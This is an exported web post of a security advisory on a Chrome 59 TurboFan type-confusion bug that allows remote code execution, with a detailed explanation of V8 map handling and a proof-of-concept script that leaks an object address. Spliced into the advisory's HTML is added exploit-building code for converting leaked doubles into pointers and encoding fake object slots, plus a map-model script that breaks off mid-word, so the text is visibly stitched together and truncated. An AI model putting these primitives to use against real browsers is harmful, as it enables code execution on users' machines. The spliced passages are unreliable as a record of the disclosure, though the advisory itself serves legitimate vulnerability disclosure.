{"id":8775,"date":"2017-08-16T14:19:05","date_gmt":"2017-08-16T22:19:05","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/16\/news-2548\/"},"modified":"2017-08-16T14:19:05","modified_gmt":"2017-08-16T22:19:05","slug":"news-2548","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/16\/news-2548\/","title":{"rendered":"SSD Advisory \u2013 Chrome Turbofan Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Wed, 16 Aug 2017 07:21:39 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a type confusion vulnerability in Chrome browser version 59 that leads to remote code execution.<\/p>\n<p>The vulnerability results from an incorrect optimization by the TurboFan compiler, which confuses access to an array of object pointers with access to an array of unboxed values. Optimized code can therefore read objects as if they were plain values (leaking their in-memory address) or, in the other direction, write values into an array of object pointers, which allows objects to be faked completely. 
<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Google was informed of the vulnerability and a ticket was opened: <a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=746946\" target=\"_blank\">https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=746946<\/a>. Because the vulnerability stopped reproducing in Chrome 60, Google does not plan to address it with a separate security advisory or patch; users should therefore make sure they are running Chrome 60 or later.<\/p>\n<p><u><strong>Vulnerability details<\/strong><\/u><\/p>\n<p><strong>Background<\/strong><\/p>\n<p><u>Object maps<\/u><\/p>\n<p>Every object has a map describing the object\u2019s structure (its keys and the types of their values). Two objects with the same structure but different values share the same map. The most common representation of an object is as follows:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/Chrome-RCE.png\"><img src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/Chrome-RCE.png\" alt=\"Object layout: a map pointer followed by a fixed array of named properties and a fixed array of numbered properties\" \/><\/a><\/p>\n<p>Here the map field (a pointer to a map) holds the object\u2019s map. The two fixed arrays hold extra named properties and numbered properties respectively.\n
The numbered properties are commonly called \u201cElements\u201d.<\/p>\n<p><u>Map transitions<\/u><br \/> When we add a new property to an object, the object\u2019s map no longer describes it. A new map is created to fit the new structure, and a transition descriptor is added to the original map recording how it changes into the new map. <\/p>\n<p>For example:<\/p>\n<div id=\"crayon-5994c4d82668d623185845\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span><\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">var obj = {}; \/\/ Map M0 is created and assigned to the object\nobj.x = 1;    \/\/ Map M1 is created and records where the value of x is stored. A transition \u201cx\u201d is added to M0 with target M1.\nobj.y = 1;    \/\/ Map M2 is created and records where the value of y is stored. A transition \u201cy\u201d is added to M1 with target M2.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p>These transitions can later be used by the compiler to re-optimize functions when an inline cache miss occurs.<\/p>\n<p><u>Elements kind<\/u><br \/> The elements of an object are, as stated above, the values of its numbered keys. They are stored in a separate array pointed to from the object. The object\u2019s map has a bit field called <em>ElementsKind<\/em> that describes whether the values in the elements array are <em>boxed<\/em>, <em>unboxed<\/em>, <em>contiguous<\/em>, <em>sparse<\/em>, etc. Maps that differ only by elements kind are not connected by a regular property transition.<\/p>\n<p><u>V8 arrays<\/u><br \/> Arrays in V8 are typed, and can hold either \u201cboxed\u201d or \u201cunboxed\u201d values. This determines whether the array holds only numbers, which can then be stored directly in its slots as doubles (referred to here as \u201cfast\u201d arrays; V8 also has a separate elements kind for small integers, but the distinction does not matter here), or whether it can also hold more complex values, in which case each slot holds a pointer to an object.<\/p>\n<p>A simplified representation of the two cases:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/V8array.jpg\"><img src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/V8array.jpg\" alt=\"Unboxed (fast) array holding doubles directly next to a boxed array holding pointers to objects\" \/><\/a><\/p>\n<p>(The elements kind of the array itself determines whether the values are boxed or unboxed.)<\/p>\n<p>So, if we have a fast array such as the one on the left above and then assign a complex object (such as an array) to one of its slots, the whole array is converted to a boxed one, and all existing values are boxed as well: each double is moved into a heap-allocated number object and the slot now holds a pointer to it.<\/p>\n<p><u>V8 optimization<\/u><br \/> V8 first generates JIT-compiled code with very loose assumptions about types, collecting type feedback through inline caches. <\/p>\n<p>The following explanations are taken from Google\u2019s V8 documentation:<\/p>\n<p>\u201cV8 compiles JavaScript source code directly into machine code when it is first executed. There are no intermediate byte codes, no interpreter.\n
Property access is handled by inline cache code that may be patched with other machine instructions as V8 executes&#8230;.\u201d<br \/> \u201c&#8230;V8 optimizes property access by predicting that this [the object&#8217;s] class will also be used for all future objects accessed in the same section of code and uses the information in the class to patch the inline cache code to use the hidden class. If V8 has predicted correctly the property&#8217;s value is assigned (or fetched) in a single operation. If the prediction is incorrect, V8 patches the code to remove the optimisation.\u201d<\/p>\n<p>So the compiler will only compile code that works for specific types. If the next time this code section (or function) executes the type does not match the one compiled, an \u201cinline cache miss\u201d will occur, causing the compiler to recompile the code.<\/p>\n<p>For example, assume we have a function <em>f<\/em> and two objects <em>o1<\/em> and <em>o2<\/em> as such:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5994c4d826699466089420\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">function f(arg_obj) {\n\treturn arg_obj.x;\n}\nvar o1 = {\"x\": 1, \"y\": 2};\nvar o2 = {\"x\": 1, \"t\": 2};<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p>Now if the function is first called with <em>o1<\/em>, the compiler will generate code like the following (32-bit pseudo-assembly):<\/p>\n<div id=\"crayon-5994c4d82669c147608172\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span><\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">; ecx holds the argument\ncmp [ecx + &lt;hidden class offset&gt;], &lt;cached o1 class&gt;\njne &lt;inline cache miss&gt;        ; jumps into compiler code that handles the miss\nmov eax, [ecx + &lt;cached x offset&gt;]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p>When the function is called again with <em>o2<\/em>, a cache miss occurs, and the function\u2019s JIT code will be changed by compiler code.<\/p>\n<p><strong>The vulnerability<\/strong><\/p>\n<p><u>Elements kind transitions<\/u><\/p>\n<p>When a cache miss occurs and the compiler re-optimizes a function, it uses both the saved transitions and any needed <em>ElementsKindTransitions<\/em> (transitions to a map that differs only by elements kind), which are generated on the fly by <em>Map::FindElementsKindTransitionedMap<\/em>. These can be generated on the fly because they only require changing the <em>ElementsKind<\/em> bit field rather than building a completely new map.<\/p>\n<p><u>Stable maps<\/u><br \/> A map is marked stable when no transitions lead out of it (it is a leaf of the transition tree). Optimized code that accesses objects of a stable map registers a dependency on that stability, so it is deoptimized if the map later becomes unstable. <\/p>\n<p>The vulnerability occurs when the optimizing compiler decides that a function has run often enough to be worth \u201creducing\u201d (TurboFan\u2019s term for rewriting nodes of the function\u2019s intermediate graph into simpler, more specialized nodes). The function <em>ReduceElementAccess<\/em> is called to reduce accesses to elements of an object. It in turn calls <em>ComputeElementAccessInfos<\/em>.<\/p>\n<p><em>ComputeElementAccessInfos<\/em> is also the function that searches for elements kind transitions that can help the optimization. <\/p>\n<p>The problem arises if such a transition is generated and used from a stable map. If that happens, the transition only affects the current function; other functions that were optimized against the same stable map are never told about the elements kind change.<\/p>\n<p>What happens is this: First, a function is reduced in a way that makes it change the elements kind of a stable map. Next, a second function is reduced in a way that simply stores or loads an element of an object with the same stable map. Now, an object of that map is created. The first function is called with that object as the argument, and the elements kind is changed.<\/p>\n<p>The second function is called, and its optimized code is neither invalidated nor does its inline cache miss: an elements kind transition is not a regular transition into a different map that would cause a cache miss, and because the source map was never marked unstable, nothing deoptimized the code that depends on it. <\/p>\n<p>Since the cache did not miss, the function stores and loads elements as if the object\u2019s elements were still unboxed, <strong>so we get a read\/write into an array of object pointers<\/strong>.<\/p>\n<p>This exact scenario had actually already been addressed in an earlier commit (<a href=\"https:\/\/chromium.googlesource.com\/v8\/v8\/+\/2d856544e5e3cb8abf99a30749b4bfe39c29886a\" target=\"_blank\">https:\/\/chromium.googlesource.com\/v8\/v8\/+\/2d856544e5e3cb8abf99a30749b4bfe39c29886a<\/a>): \u201cEnsure source map is not stable if elements kind transitions are expected.\u201d<\/p>\n<p>What the compiler does is the following: when a cache miss occurs in the function, the compiler checks whether the miss can be resolved with an elements kind transition. This is done in <em>KeyedStoreIC::StoreElementPolymorphicHandlers<\/em> and <em>KeyedLoadIC::LoadElementPolymorphicHandlers<\/em>. The diff of that commit shows that if the source map of the transition is stable, it is marked unstable (which deoptimizes any optimized code depending on it), so that the transition takes effect for all functions using the map. 
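The read/write into an array of object pointers described above hands the attacker the raw 64-bit contents of a slot as a double (the proof of concept below returns the Array constructor pointer that way). The helpers that follow are an added illustration, not part of the advisory or of its PoC: they show how such a leaked double is reinterpreted as a tagged pointer and how a tagged value is encoded as a double for the write direction, which is the first thing a practitioner does with this kind of primitive. They assume a 64-bit V8 without pointer compression, as in Chrome 59 on x64, where a heap object pointer carries a tag bit of 1 in its lowest bit and a Smi keeps its signed 32-bit value in the upper half of the slot. The slot values used in `demo()` are constructed, not taken from a real run.

```javascript
'use strict';

// Added example: reinterpreting the double that a boxed/unboxed elements
// confusion leaks as the 64-bit tagged value it really is, and encoding a
// tagged value as a double for the write direction. Assumes 64-bit V8 without
// pointer compression (Chrome 59 on x64): low bit 1 marks a heap object
// pointer, and a Smi keeps its signed 32-bit value in the upper 32 bits.
const conv = new ArrayBuffer(8);
const asDouble = new Float64Array(conv);
const asBits = new BigUint64Array(conv);

// Raw bits of a double. Pointer-sized values have a zero exponent field, so
// they come through as subnormal doubles and survive the round trip intact.
function f2i(d) {
  asDouble[0] = d;
  return asBits[0];
}

// A double whose bit pattern equals the given 64-bit value. Only NaN-patterned
// bit strings (exponent all ones) risk being canonicalized by the engine.
function i2f(bits) {
  asBits[0] = BigInt.asUintN(64, bits);
  return asDouble[0];
}

const HEAP_OBJECT_TAG = 1n;

// Decode a tagged slot: a heap object pointer (tag bit set) or a Smi.
function decodeTagged(bits) {
  if ((bits & HEAP_OBJECT_TAG) === HEAP_OBJECT_TAG) {
    return { kind: 'heap_object', address: bits - HEAP_OBJECT_TAG };
  }
  return { kind: 'smi', value: Number(BigInt.asIntN(32, bits >> 32n)) };
}

// Encode both kinds for the write direction (faking the contents of a slot).
function encodeHeapObject(address) {
  if ((address & 1n) !== 0n) throw new RangeError('heap object addresses are word aligned');
  return address | HEAP_OBJECT_TAG;
}
function encodeSmi(value) {
  if (!Number.isInteger(value) || value < -(2 ** 31) || value > 2 ** 31 - 1) {
    throw new RangeError('not a 32-bit Smi');
  }
  return BigInt.asUintN(64, BigInt(value) << 32n);
}

// What the confused reader would hand back: a double carrying a tagged pointer.
// The addresses below are constructed samples, not values from a real run.
function demo() {
  const leaked = i2f(0x00003ac1f4c0a5d1n);                    // as returned by read_as_unboxed()
  const decoded = decodeTagged(f2i(leaked));                   // -> heap object at ...a5d0
  const fakeSlot = i2f(encodeHeapObject(0x00003ac1f4c0b000n)); // what to store through the unboxed side
  return { leaked, decoded, fakeSlotBits: f2i(fakeSlot) };
}
```

The `RangeError` checks matter in practice: a misaligned "address" or an out-of-range Smi silently produces a value the engine will interpret as something else, which is exactly the kind of mistake that turns a controlled primitive into an uncontrolled crash.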
<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE1.png\"><img src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE1.png\" alt=\"Diff of the commit: the source map of an elements kind transition is marked unstable\" \/><\/a><\/p>\n<p>So the first time a call to the function needs to change the map\u2019s elements kind, <em>StoreElementPolymorphicHandlers<\/em> calls <em>FindElementsKindTransitionedMap<\/em>, finds an elements kind transition, and marks the source map unstable. This ensures that code already optimized against that map is deoptimized and that future code will not be optimized against it, so the elements kind change is handled correctly everywhere. <\/p>\n<p><strong>So, how do we get an elements kind transition from a stable map despite the above?<\/strong><\/p>\n<p>Before explaining this we have to explain what a deprecated map is. A deprecated map is a map whose objects have all been migrated to a different map, for example after the representation of one of its fields was generalized (as when a property that held a small integer is assigned an object). A deprecated map is marked unstable, code depending on it is deoptimized, and it is removed from the transition tree (the transition to it is removed, as well as any transitions from it). <\/p>\n<p>Now, if we take a look at the <em>ComputeElementAccessInfos<\/em> code, we can see that just before the call to <em>FindElementsKindTransitionedMap<\/em>, a call to <em>TryUpdate<\/em> is performed. 
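To make the map bookkeeping concrete, here is a small model of the mechanism this section describes: a transition tree whose leaf maps are stable and have optimized code depending on them, deprecation of a map after a field is generalized, a TryUpdate that replays a deprecated map's transition path from the root to find its live replacement, and an elements kind transition whose only guard against a stable source map is a debug-build check. This is an added illustration written for this page, not V8 source; every name in it (`MapModel`, `tryUpdate`, `elementsKindTransition`, `simulatePoC`) is the model's own, and `simulatePoC` replays the sequence of the proof of concept below against the model.

```javascript
'use strict';

// Added example: a toy model of V8's map transition tree, map stability,
// map deprecation and TryUpdate, used to replay the advisory's PoC sequence.
// Not V8 code; every name here is the model's own.
class MapModel {
  constructor(parent, key, fieldTypes, elementsKind) {
    this.parent = parent;             // map we transitioned from (null for the root)
    this.key = key;                   // property whose transition created this map
    this.fieldTypes = fieldTypes;     // { propertyName: 'number' | 'object' }
    this.elementsKind = elementsKind; // 'unboxed' (raw doubles) or 'boxed' (pointers)
    this.transitions = new Map();     // propertyName -> child map
    this.stable = true;               // no transitions out of this map yet
    this.deprecated = false;
    this.dependents = new Set();      // optimized code relying on this map staying stable
  }
  get root() { return this.parent === null ? this : this.parent.root; }
  get path() { return this.parent === null ? [] : this.parent.path.concat(this.key); }
}

// Making a map unstable deoptimizes everything that depended on its stability.
function markUnstable(map) {
  map.stable = false;
  for (const code of map.dependents) code.deoptimized = true;
  map.dependents.clear();
}

// Adding a property creates (or reuses) a child map; the parent is no longer a leaf.
function addProper...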
<\/p>\n<p><em>Tryupdate<\/em> is a function that, upon receiving a deprecated map, attempts to find another map from the same \u201ctree\u201d (meaning coming from the same root map through the same transitions) that is not deprecated, and returns that if such a map exists. <\/p>\n<p>The original source map for the elements kind transition, set to unstable in <em>LoadElementPolymorphicHandlers<\/em> has become deprecated. <em>TryUpdate<\/em> finds another map, and switches to that one. But this map was never used in optimizing this function, so it was never set to unstable, and we again get an elements kind transition from a stable map.<\/p>\n<p>The source code actually has a debug check to make sure that a transition was not generated from a stable map (added at the same commit where maps are made unstable), but this obviously does not affect release versions:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE2.png\" data-slb-active=\"1\" data-slb-asset=\"1140375998\" data-slb-internal=\"0\" data-slb-group=\"3379\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE2-300x99.png\" alt=\"\" width=\"300\" height=\"99\" class=\"alignnone size-medium wp-image-3383\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE2-300x99.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE2.png 748w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong><u>Minimal Proof of Concept<\/u><\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5994c4d8266a2429298345\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" 
data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;script&gt;  \/\/ The function that will be optimized to change elements kind. Could be called the \u201cevil\u201d function.  function change_elements_kind(a){  \ta[0] = Array;  }   \/\/ The function that will be optimized to read values directly as unboxed (and will therefore read pointers as values). Could also be called the \u201cevil\u201d function.  
function read_as_unboxed(){\t      return evil[0];  }    \/\/ First, we want to make the function compile. Call it.  change_elements_kind({});    \/\/ Construct a new object. Let\u2019s call it\u2019s map M0.  map_manipulator = new Array(1.0,2.3);   \/\/ We add the property \u2018x\u2019. M0 will now have an \u2018x\u2019 transition to the new one, M1.   map_manipulator.x = 7;  \/\/ Call the function with this object. A version of the function for this M1 will be compiled.  change_elements_kind(map_manipulator);    \/\/ Change the object\u2019s \u2018x\u2019 property type. The previous \u2018x\u2019 transition from M0 to M1 will be removed, and M1 will be deprecated. A new map, M2, with a new \u2018x\u2019 transition from M0 is generated.  map_manipulator.x = {};        \/\/ Generate the object we\u2019ll use for the vulnerability. Make sure it is of the M2 map.  evil = new Array(1.1,2.2);  evil.x = {};    x = new Array({});  \/\/ Optimize change_elements_kind.   \/\/ ReduceElementAccess will be called, and it will in turn call ComputeElementAccessInfos. In the code  \/\/ snippet below (same as before), we can see that the code runs through all the maps (Note: these are \/\/ maps that have already been used in this function and compiled), and tries to update each of them.  \/\/ When reaching M1, TryUpdate will see that it\u2019s deprecated and look for a suitable non-deprecated   \/\/ map, and will find M2, since it has the same properties. Therefore, an elements kind transition will be   \/\/ created from M2.  for(var i = 0;i&lt;0x50000;i++){      change_elements_kind(x);  }       \/\/ Optimize read_as_unboxed. Evil is currently an instance of the M2 map, so the function will be  \/\/ optimized for that, and for fast element access (evil only holds unboxed numbered properties).  for(var i = 0;i&lt;0x50000;i++){      read_as_unboxed();  }    \/\/ Trigger an elements kind change on evil. 
Since change_elements_kind was optimized with an  \/\/ elements kind transition, evil\u2019s map will only be changed to reflect the new elements kind.  change_elements_kind(evil);    \/\/ Call read_as_unboxed. It\u2019s still the same M2 so a cache miss does not occur, and the optimized   \/\/ version is executed. However, that version assumes that the values in the elements array are unboxed  \/\/ so the Array constructor pointer (stored at position 0 in change_elements_kind) will be returned as a  \/\/ double.  alert(read_as_unboxed());  &lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a2429298345-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-12\">12<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5994c4d8266a2429298345-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a2429298345-56\">56<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-1\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-2\"><span class=\"crayon-c\">\/\/ The function that will be optimized to change elements kind. Could be called the \u201cevil\u201d function.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-3\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-5\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-6\"><span class=\"crayon-c\">\/\/ The function that will be optimized to read values directly as unboxed (and will therefore read pointers as values). 
Could also be called the \u201cevil\u201d function.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-7\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">read_as_unboxed<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">evil<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-9\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-11\"><span class=\"crayon-c\">\/\/ First, we want to make the function compile. Call it.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-12\"><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-14\"><span class=\"crayon-c\">\/\/ Construct a new object. 
Let\u2019s call it\u2019s map M0.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-15\"><span class=\"crayon-v\">map_manipulator<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-16\"><span class=\"crayon-c\">\/\/ We add the property \u2018x\u2019. M0 will now have an \u2018x\u2019 transition to the new one, M1. <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-17\"><span class=\"crayon-v\">map_manipulator<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-18\"><span class=\"crayon-c\">\/\/ Call the function with this object. A version of the function for this M1 will be compiled.<\/span><\/div>\n<div 